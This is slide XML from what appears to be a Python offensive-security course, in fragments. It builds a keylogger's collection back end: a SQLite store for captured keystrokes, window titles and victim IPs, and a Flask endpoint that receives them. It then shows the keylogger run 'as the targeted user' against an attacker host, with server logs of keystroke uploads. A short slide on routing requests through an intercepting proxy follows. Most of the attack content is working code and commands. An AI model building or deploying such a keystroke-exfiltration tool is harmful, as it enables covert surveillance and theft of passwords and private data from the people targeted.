              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </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keys)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VALUES(?, ?, ?, ?, ?)"""</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>conn.cursor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c.execute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sql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ip_addr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process_id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keys))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conn.commit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c.lastrowid</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(e)</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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26679091-180B-416A-8E5D-FB77DC8018E2}"/>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19508981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write a function that will fetch all the rows from the database so that they can be printed:</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969171" y="2777464"/>
            <a:ext cx="8867272"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get_keylogs</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>conn.cursor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c.execute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"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogger_results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c.fetchall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(e)</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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CD7B55-1EF7-45FF-8318-2EE8F7C8194C}"/>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89020130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write a function that will delete all the rows of the keylogger result table (in case we need to):</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969171" y="2777464"/>
            <a:ext cx="8867272"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delete_keylogs</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conn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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>conn.cursor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deleted_rows_count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c.execute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"DELETE FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogger_results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rowcount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conn.commit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deleted_rows_count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(e)</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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C743D09B-2B49-4E78-8330-92F11477199C}"/>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39801781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the database script is run directly, it can be fed two options (show, delete) database entries.</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981202" y="2349372"/>
            <a:ext cx="8867272" cy="440120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python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--show-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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python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--delete-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(DATABASE)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init_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn)</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"--show-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogs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get_keylogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn)</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row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kid, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</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keys = row</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kid</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ip</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pid</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window_title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 </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keys</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C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elif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"--delete-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogs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delete_keylogs_count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delete_keylogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn)</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delete_keylogs_count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rows have been removed"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145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82157E5B-CA13-41A0-9101-F812CBC00958}"/>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917769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not a valid option is provided, we provide a help message:</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1981202" y="2349372"/>
            <a:ext cx="8867272"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"Unrecognized option."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python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--show-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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python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--delete-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C0ECF4-1E54-4213-B257-68FF0EE6DF66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="4052609"/>
            <a:ext cx="10370118"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our database module is ready and is named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>keylogger_database.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Next, we will write the web server.</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we will install flask through pip:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC16C30-578B-42E3-9EA6-32C8486B54DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2638777" y="5485568"/>
            <a:ext cx="820969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pip install flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EA5107-3D6F-4FF0-A906-42973F6FD039}"/>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252011347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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is installed, we will import necessary modules/functions and define the app object of our web server app:</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2157666" y="2686257"/>
            <a:ext cx="8867272"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flask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Flask, request, abort</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keylogger_database</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create_db</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init_db</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insert_keylog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get_keylogs</a:t>
            </a:r>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constants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DATABASE</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app = Flask(</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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8306A58E-FBB6-4882-B865-EB0EF3240205}"/>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4844514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define a simple generator that parses the key logger json request:</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2205792" y="2413337"/>
            <a:ext cx="8867272"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parse_json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my_json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my_json.keys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my_json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].keys():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keys = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>my_json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].values()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yield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keys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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DB7BA1-F94F-419F-A44C-50498A81742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="3667598"/>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Then we will write our API handler that will handle the keylogger’s requests:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14570F4B-AB1F-4834-AB21-903F3D92F4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205792" y="4248671"/>
            <a:ext cx="8867272"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CDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@app.route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methods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"POST"</a:t>
            </a:r>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request.json</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abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>403</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"invalid request has been provided!"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conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(DATABASE)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init_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn)</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keys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parse_json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request.json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insert_keylog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.remote_addr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exec_name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window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, keys)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"OK"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="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A8DB7395-C09A-4A6F-8D89-894ECEBC5F6D}"/>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5709202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Finally, we start the web app</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2205792" y="2413337"/>
            <a:ext cx="8867272"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app.run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'0.0.0.0'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80</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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{165C5A5A-72F6-48B1-8DA8-CE3C6E725143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="3330714"/>
            <a:ext cx="10370118"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it’s time to launch the keylogger!</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we will start the flask web server:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910760ED-07DA-40B2-B559-AA72B012907A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205792" y="4478924"/>
            <a:ext cx="8867272"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python3 keylogger_server.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C46DB0-C07D-4FA9-AAAC-4CA0B9FD7FD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135930" y="5095191"/>
            <a:ext cx="10157711" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we will run the keylogger through PowerShell as the targeted user, and we will specify the host at which the keylogger server runs:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABAE621B-7AFF-478A-A06B-01C95891DD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205792" y="5938756"/>
            <a:ext cx="8867272"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C:\Users\joe\Desktop\keylogger&gt; python .\keylogger.py 192.168.10.179</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB38D1D-5A0C-41FC-BF5A-8A11B8E7A54B}"/>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1817678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Working with a proxy</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472415" y="2367950"/>
            <a:ext cx="10137507" cy="58477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requests.get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proxies</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http"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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"http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1:8080"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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71914" y="1893116"/>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tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to use a proxy through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> parameter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D766AA58-CE6E-4D2B-BB0F-7F15DDEFC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184" y="3027449"/>
            <a:ext cx="8850792" cy="3311521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FE5735-51A5-4087-8FDD-8640B77EDC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069024" y="6357351"/>
            <a:ext cx="10406213" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In case you need to intercept HTTPS requests, you can do that by adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54259A5-5724-4580-9B58-561305966CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46607745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Starting to type anything on the target user’s computer will show some requests coming from the target:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D048742-4C69-4F9C-938E-3DC3B7BB97C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117561" y="2649958"/>
            <a:ext cx="982177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python keylogger_server.py</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192.168.10.192 - - [15/Dec/2021 21:52:09] "POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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 HTTP/1.1" 200 -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.10.192 - - [15/Dec/2021 21:52:29] "POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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 HTTP/1.1" 200 -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.10.192 - - [15/Dec/2021 21:52:39] "POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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 HTTP/1.1" 200 -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.10.192 - - [15/Dec/2021 21:52:49] "POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add_keylogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1" 200 -</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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FA997F6-F7FC-424B-A7C1-20B190AED298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="4158280"/>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use the database module to list the database, we will see few entries!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
